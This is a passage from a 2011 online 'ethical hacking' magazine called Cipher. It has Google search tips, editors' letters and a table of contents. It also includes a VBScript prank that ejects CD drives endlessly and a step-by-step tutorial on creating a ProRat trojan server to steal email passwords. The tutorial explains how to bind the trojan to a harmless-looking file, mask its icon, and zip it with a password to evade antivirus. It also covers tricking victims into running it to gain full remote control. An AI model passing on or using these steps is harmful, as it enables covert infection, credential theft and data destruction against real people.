50. The modifier music: followed by a band, song or album returns music reviews. 51. Try searching for weather London you'll get a full 4-day forecast. 52. There's also a built-in dictionary. Try define:<word> in the search box. 53. Google stores the content of old sites. You can search this cache direct with the syntax keyword cache:site_url 54. Alternatively, enter cache:site_url into Google's search box to be taken direct to the stored site. 55. No calculator handy? Use Google's built in features. Try typing 12*15 and hitting "Google Search". 56. Google's calculator converts measurements and understands natural language. Type in 14 stones in kilos, for example. 57. It does currency conversion too. Try 200 pounds in euros 58. If you know the currency code you can type 200 GBP in EUR instead for more reliable results. 59. And temperature! Just type: 98 f to c to convert Fahrenheit to Centigrade. 60. Want to know how clever Google really is? Type 2476 in roman numerals, and then hit "Google Search"... 61. You can personalize your Google experience by creating a Google account. Go to www.google.com/account/ then click "Create Account". 62. With a Google account there are lots more extras available. You'll get a free Gmail email account for one. 63. With your Google account, you can also personalise your front page. Click "iGoogle" to add blog and site feeds. 64. Click "Add a Tab" in iGoogle to add custom tabs. Google automatically populates them with suitable site suggestions. 65. iGoogle allows you to theme your page too. Click "Select Theme" to change the default look. 66. Some iGoogle themes change with time..."Sweet Dreams" is a theme that turns from day to night as you browse. 67. Click "More" under "Try something new" to access a full list of Google sites and new features. 68. "Custom Search" enables you to create a branded Google search for your own site. 69. An active, useful service missing from the list is "Personalised Search" but you can access it via www.google.com/psearch when you're logged in. 70. This page lists searches you have recently made and is divided into categories. Clicking "pause" stops Google from recording your history. 71. Click "Trends" to see the sites you visit most, the terms you enter most often and links you've clicked on! 72. Personalised Search also includes a bookmark facility which enables you to save bookmarks online and access them from anywhere.
www.amiable.in
32
November 2011
73. You can add bookmarks or access your bookmarks using the iGoogle Bookmarks gadget. 74. Did you know you can search within your returned results? Scroll down to the bottom of the search results page to find the link. 75. Search locally by appending your postcode to the end of query. For example Indian food BA1 2BW finds restaurants in Bath, with addresses and phone numbers! 76. Looking for a map? Just add map to the end of your query, like this: Leeds map 77. Google finds images just as easily and lists them at the top, when you add image to the end of your search. 78. Google Image Search recognizes faces, add &imgtype=face to the end of the returned URL in the location bar, and then hit enter to filter out pictures that aren't people. 79. Keeping an eye on stocks? Type stocks: followed by market ticker for the company and Google returns the data from Google Finance. 80. Enter the carrier and flight number in Google's main search box to return flight tracking information. 81. What time is it? Find out anywhere by typing time then the name of a place. 82. You may have noticed Google suggests alternate spellings for search terms that's the built in spell checker! 83. You can invoke the spell checker directly by using spell: followed by your keyword. 84. Click "I'm Feeling Lucky" to be taken straight to the first page Google finds for your keyword. 85. Enter a statistics-based query like population of Britain into Google, and it will show you the answer at the top of its results. 86. If your search has none-English results, click "Translate this Page" to see it in English. 87. You can search foreign sites specifically by clicking "Language Tools", then choosing which countries sites to translate your query to. 88. Other features on the language tools page include a translator for blocks of text you can type or cut and paste. 89. There's also a box that you can enter a direct URL into, translating to the chosen language. 90. Near the language tools link, you'll see the "Search Preferences". This handy page is full of secret functionality. 91. You can specify which languages Google returns results in, ticking as many (or few) boxes as you like. 92. Google's Safe Search protects you from explicit sexual content. You can choose to filter results more stringently or switch it off completely. 93. Google's default of 10 results a page can be increased to up to 100 in Search Preferences, too. 94. You can also set Google to open your search results in a new window.
www.amiable.in
33
November 2011
95. Want to see what others are searching for or improve your page rank? Go to www.google.com/zeitgeist 96. Another useful, experimental search can be found at www.google.com/trends where you can find the hottest search terms. 97. To compare the performance of two or more terms, enter them into the trends search box separated by commas. 98. Fancy searching Google in Klingon? Go to www.google.com/intl/xx-klingon 99. Perhaps the Swedish chef from the Muppets is your role model instead? Check www.google.com/intl/xx-bork 100. Type answer to life, the universe and everything into Google. You may be surprised by the result. 101. It will also tell you the number of horns on a unicorn
Advertisement Here
www.amiable.in
34
November 2011
Eject your drives in and out infinitely

A simple VB Script will serve the purpose. Do the following: 1. Go to Start >> Run 2. Type Notepad and hit Enter 3. Now in Notepad type: Set oWMP = CreateObject("WMPlayer.OCX.7" ) Set colCDROMs = oWMP.cdromCollection if colCDROMs.Count >= 1 then do For i = 0 to colCDROMs.Count - 1 colCDROMs.Item(i).Eject Next ' cdrom For i = 0 to colCDROMs.Count - 1 colCDROMs.Item(i).Eject Next ' cdrom loop End If 4. Go to File >> Save As... 5. Type Eject.vbs and click Save How to use: Just Double Click the saved file (Eject.vbs) How To Stop: 1. Restart the Computer... and this will stop the script 2. Open Task Manager and in processes search for wscript.exe and click End Process
Making a Trojan Virus in ProRat v1.9

Here I will show you how to hack email account password using keyloggers and trojans. Here I am demonstrating using PRORAT trojan. You can use any trojan or keylogger as per your ease. The basic functionality of all backdoors is same. Please make note that all these hacking tools and software are detected by antivirus. You have to uninstall or close you running antivirus first. 1. First of all Download ProRat v1.9. Once it is downloaded right click on the folder and choose to extract it. A password prompt will come up. The password will be "pro" (Without Quotation Marks). 2. Open up the program. You should see the following:
www.amiable.in
35
November 2011
3. Next we will create the ProRat Trojan server. Click on the Create button in the bottom. Choose Create ProRat Server.
4. Next put in your IP address so the server could connect to you. If you don't know your IP address click on the little arrow to have it filled in for you automatically. Next put in your email so that when and if a victim gets infected it will send you a message. We will not be using the rest of the options. 5. Now Open General Settings. This tab is the most important tab. In the check boxes, we will choose the server port the program will connect through, the password you will be asked to enter when the victim is infected and you wish to connect with them, and the victim name. As you can see ProRat has the ability to disable the windows firewall and hide itself from being displayed in the task manager.
Here is a quick overview of what they mean and which should be checked:
6. Click on the Bind with File button to continue. Here you will have the option to bind the trojan server file with another file. Remember a trojan can only be executed if a human runs it. So by binding it with a legitimate file like a text document or a game, the chances of someone clicking it go up. Check the bind option and select a file to bind it to. A good suggestion is a picture or an ordinary text document because that is a small file and its easier to send to the people you need. 7. Click on the Server Extensions button to continue. Here you choose what kind of server file to generate. I prefer using .exe files, because it is cryptable and has icon support, but exe's looks suspicious so it would be smart to change it. 8. Click on Server Icon to continue. Here you will choose an icon for your server file to have. The icons help mask what the file actually is. For my example I will choose the regular text document icon since my file is a text document. 9. After this, press Create Server, your server will be in the same folder as ProRat. A new file with name "binded_server" will be created. Rename this file to something describing the picture. A hacker could also put it up as a torrent pretending it is something else, like the latest game that just came out so he could get people to download it.
Very important: Do not open the "binded_server" file on your system.

10. You can send this trojan server via email, pendrive or if you have physical access to the system, go and run the file. You can not send this file via email as "server.exe", because it will be detected as trojan or virus. Password protect this file with ZIP and then email it. Once your victim downloads this ZIP file, ask him to unlock it using ZIP password. When the victim will double click on the file, he will be in your control. 11. Now, I will show you what happens when a victim installs the server onto his computer and what the hacker could do next. Once the victim runs the server on his computer, the trojan will be installed onto his computer in the background. The hacker would then get a message telling him that the victim was infected. He would then connect to his computer by typing in his IP address, port and clicking Connect. He will be asked for the password that he made when he created the server. Once he types it in, he will be connected to the victim's computer and have full control over it.
www.amiable.in
36
November 2011
12. Now the hacker has a lot of options to choose from as you can see on the right. He has access to all victim's computer files, he can shut down his pc, get all the saved passwords off his computer, send a message to his computer, format his whole hard drive, take a screen shot of his computer, and so much more. Below I'll show you a few examples.
13. Below is an image of what the hacker would see if he chooses to take a screen shot of the victims screen.
As you saw in the above example, a hacker can do a lot of silly things or a lot of damage to the victim. ProRat is a very well known trojan so if the victim has an anti-virus program installed he most likely won't get infected. Many skilled hackers can program their own viruses and Trojans that can easily bypass anti-virus programs.
Advertisement Here

www.amiable.in
37
CiPHER
November 11
Words byAmiable
Amiable
knowledge. Yes, Facebook played a role here. I love to share things. I started to contact people with extra terrestrial knowledge on Ethical Hacking and preparing a ground for them. It took a lot to convince them for sharing their content to the world. Adarsh was always with me whether it's raining or temperature is 40C. Some of my batch mates and juniors too came to help me with my quest. The magazine started to take shape: the ideas, content, people, k n o w l e d g e , st u d e n t s , p ro fe s s i o n a l s , enthusiasts, bloggers and moreover sharing. Education is priceless; we can not evaluate it in terms of money. Education is just like an emotion which should flow from one heart to the other. It should be free. I have always seen students reaching at the technical magazines, after reading it a bit and staring at the cost, they prefer not to purchase. Yes, money is the root here. We tried to eliminate that and we came across the Internet, the Guru of Gurus. It was planned that magazine will be FREE and can be downloaded or read from our website (www.amiable.in). Moreover, the polluting cause was eliminated. Use of paper, only harms the environment. Knowledge is a treasure, it increases if you share it. You will never loose a bit if you share your knowledge with the world. You will get experience day by day which will take you to more heights. I would like to request all the readers, students, bloggers, enthusiasts, professionals and researchers to please contribute towards the magazine. Share your knowledge and make this magazine always FREE. The contribution by any reader will be an honor for us to include it in upcoming editions. Readers can contribute by mailing the content and contact details (blogs preferred) at content@amiable.in. Bloggers can mail a permalink of their blog. To maintain the quality of the content, it will go through some editing before finally publishing it in the magazine. People share there views and reviews everyday over the Internet. Jasmine Revolution was a result of sharing. People are always a part of sharing and are learners. With this free magazine on Ethical Hacking, I am on quest to educate a noob about Security of the systems. I am sure one day our world will change. With this I present you CIPHERA FREE Ethical Hacking Magazine.
Aakash Mishra
Founder
It was raining heavily and I was sipping my coffee with just nothing in my mind. Two guys came in with heavy and geek looks. Sitting behind me they were talking something about technology and people. Suddenly one of them started talking loudly about the monopoly of magazines over the market. I guess, he was not that financially sound to buy costly magazine every month. As the blood rushed in my brain, I came up with a brilliant thought, Why not give them free what they want? Why to waste money on paper and support pollution? At the end of the day, it was done and I was working on how I can make this happen. I have seen and met people who are the best in their field but lack a medium to share their
Adarsh Shukla , professionally a web developer and Co-founder of Amiable Technologies. From Childhood Times I love to read Tech Magazines but because of cost being a factor I was not able to buy them so frequently so to eliminate the factor of cost.Another thing that came to my mind was Why we spend Money in earning Knowledge. Why today knowledge is getting dumped under cost. Why we have to pay for knowledge. Why knowledge cant be free. I soon Started finding the answer these questions and i come to a conclusion. " Why to buy......When its Free. We decided to launch a Free Online magazine .I find a great pleasure in launching this magazine Cipher. It is our first attempt to eliminate factor of cost from knowledge. Giving support to all those people who are not able to spend 150 bucks or so on buying Tech Magazines.Cipher is made for all those who are keen about Ethical hacking and whats going on latest in the field of internet. Any one who is interest to share his/her knowledge is kindly invited. Send your article to us at content@amiable.in And help us in making knowledge cost free. So kindly support us in making this magazine HUGE. "Your Support Is our Demand."
Mayank Tripathi, a Graphic Designer and a part of Amiable Technologies. With the computer era soaring, there is a mammoth increase in its use and disuse. Examples are innumerable. I, as the designer of this magazine was particularly curious about the concept of the magazine, i.e. Ethical Hacking. It is a very innovative field which made me work 24 * 7 on it. It gave me immense pleasure designing this magazine and I had some wonderful experiences of my life. Got to learn a lot. The task, no doubt, was difficult and time - consuming, it rather came as a challenge for me, but the passion and excitement to learn something new dominated it all and I let myself go making it. It was great fun working with such knowledgeable persons like Mr. Aakash Mishra and Mr. Adarsh Shukla, and with Amiable Technologies. The best part of such a knowledgeable magazine is that it is available for free. So, Why to buy... When its Free? It also enables the magazine to enlarge its abilities to masses. Cipher is a perfect package for all computer lovers. We have endeavored it giving emphasis on both freshers and professionals, so that everybody is empowered to get a hold on it. I hope Readers will like it...!
www.amiable.in
November 2011
Contributing Artists
Mayank Tripathi
(mayank@amiable.in)
Anmol Kanchan
(anmol.kanchan@gmail.com)
www.amiable.in

CipherMagazine Nov2011 HQ

Uploaded by

Document Information

Original Description:

Original Title

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

CipherMagazine Nov2011 HQ

Uploaded by

Copyright:

Available Formats

CiPHER

SHARE YOUR KNOWLEDGE

Fresh White Hat

Student Arrested for

Hacking Thai PM's Account

Android Malware Works on Remote Commands form Encrypted Blog

Apache releases Security Advisory following

Computer Virus Hits

U.S. Drone Fleet

18 Child Porn Websites

Ransacked in Huge Brute-Force Attack

Hacked, Porn Posted

Miley Cyrus Needs A Lesson

Google Teams Up with Citizens Advice Bureau

Duqu: Son of Stuxnet

Bug in Flash Player

Hackers Leak Citigroup CEO's Personal Data,

Anonymous Hackers Shut Down Child Porn Website

YouTube Channel Hacked

Anonymous DDoS Oakland Police Site After Violence

China may have Hacked US Satellites

Fbs EXE Attachment Vulnerability

Kinect Challenge for Malcon 2011 has been Completed by

Facebook Ticker is Exposing

Without Your Knowledge

India Shuts Down Server

Duqu Virus Investigation

'Anonymous' Hackers Group Threat to New York Stock Exchange

ManagerSubSystems. Delete the subkeys Os2 and Posix then

Lulzsec hacker: 'we still have Sun emails, stored in China'

Password File through FTP

Hacking group accuses German police of using info-stealing Trojan.

Android malware - Works on remote commands form encrypted blog

Using a Professional Service

Press both mouse buttons repeatedly during the boot

Password cracking software

Using the Motherboard "Clear CMOS" Jumper or Dipswitch settings

AMI BIOS backdoor passwords:

PHOENIX BIOS backdoor passwords:

Other BIOS Passwords by Manufacturer :

Apache Patch released for Reverse proxy Bypass Vulnerability

Removing the CMOS Battery

Overloading the KeyBoard Buffer

Jumping the Solder Beads on the CMOS

Using a professional service

Microsoft FUSE Labs Sub-domain defaced by Hmei7

Student Arrested for hacking Thailand Prime Minister Accounts

Malware on Mac Computer Appears as a PDF File

Hack an Ethernet ADSL Router

Facebook Improves Security through Websense Service

SQL Injection: A Simple Example

Cyber Cell Mumbai Websites hacked by Pakistani Hacker

What is the impact of SQL Injection?

Is my database at risk to SQL Injection?

Example of a SQL Injection Attack

How do I prevent SQL Injection attacks?

Contact for space : ads@amiable.in

How to Hide the Partitions?

Ultimate Google Search Tips

Contact for space : ads@amiable.in

Eject your drives in and out infinitely

Making a Trojan Virus in ProRat v1.9